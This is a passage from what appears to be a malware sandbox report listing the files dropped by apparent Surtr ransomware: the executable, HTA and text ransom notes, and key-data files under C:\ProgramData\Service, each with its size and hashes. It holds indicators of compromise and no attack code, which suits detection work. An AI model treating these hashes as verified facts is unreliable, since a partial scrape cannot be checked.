                                                                                                                                                                                                                                                              92f0e94f685ccd7b49a864890377a1d9f698f38a4e5f6e47d1de922e234dc8ce

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              c53224d28b2eec173d403ac5484e42052ee3259fc81afdc07b8f9fd428a82f536b849dbf35eacae009aacd8b90e6e790e72707e8f145d0f8f8cd2cbe7f614d93

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\PrivateData_g463r2utzh5cgl.surt

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              3a3edb6b6d3cd9b129ae37bf174bb734

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              226c9460ac2be900f50198a02af70fe2ffdec645

                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                              7f97b69e7e162eec5dbbf855423fc592f4ca7de6f326f822f0770a1e2195a666

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              db6a15a0dbfa393a53a92894e570df1d284ce46df6d50211bce7eb7f7873192cf60f61d5454373181d3cc80d9f3d14b0e28738f5b3fd2f25a3134f34be61adbd

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\PublicData_g463r2utzh5cgl.surt

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              204B

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              0e50153221b26ab25113bbe562f8711a

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              444b517a5f980f38887b3b454f3193cc01855570

                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                              3bfb114f5b995372246927e76db2a275be9df1585c60203b6d3111b21e7e6720

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              fff0b7a1c7cb7ef825e75da40c4b17835b2d33bdae7dd6fedda4d4465b4f5698fe02427f8c41a45752ace24fb96facabbc331bc7706a46a42c77477ea5f7b2bc

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SURTR_README.hta

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              a504680a2ca777121a6f333ab2026402

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              f94367376df17cc19c1b59921170bf6f4e6d9d98

                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                              b493df8bda3a45a0ff129b1fe679841640afa67babe9ee4a1bd254d6cb254876

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              2a6195abb8bf68fe58eabbfb83d626cef5978ee6fcad17489f5c73fd8d71e6a4b6619f944b9a044dcc519fa75f3b799b55f3d2abab87386ddd051db0e19b86e8

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\SURTR_README.txt

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              625B

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              6a09c671884c09fda4fae1c2190e0f2d

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              04931eafb6602452a6480e7980a1e51be9ef43f2

                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                              03c215fdd2a3cd39f964947979f203b6994b0895f4c5bca98cd507c07e03191c

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              e0860ede5d04fc052fb3feecaa40fffb2ad1f3ed1f68ff5d9a5b62432209fe6bab1d52fed1fb27cabaefdd27f2a531cfc2f059204c5cff5d2669f0f1b24ec79c

                                                                                                                                                                                                                                                            • C:\ProgramData\Service\Surtr.exe

                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                              1.1MB

                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                              ad539ebdf9e34e02be487134cf9a6713

                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                              b5af8a12c5a6ed369debaad7eab59e3cb1715e2d

                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                              abd49fd6f57d4f0ffef794257692c61b2089ee412ae27fe36a9ffee41f9d5e14

                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                              386291d7dd9fa62f7514e784a238bd7a5099a0d2edd8af6085c61e3953a6914faf3dc299f07d56bed3b5b337a18c8b636c84f88693d3bc2512f8dfd51e711492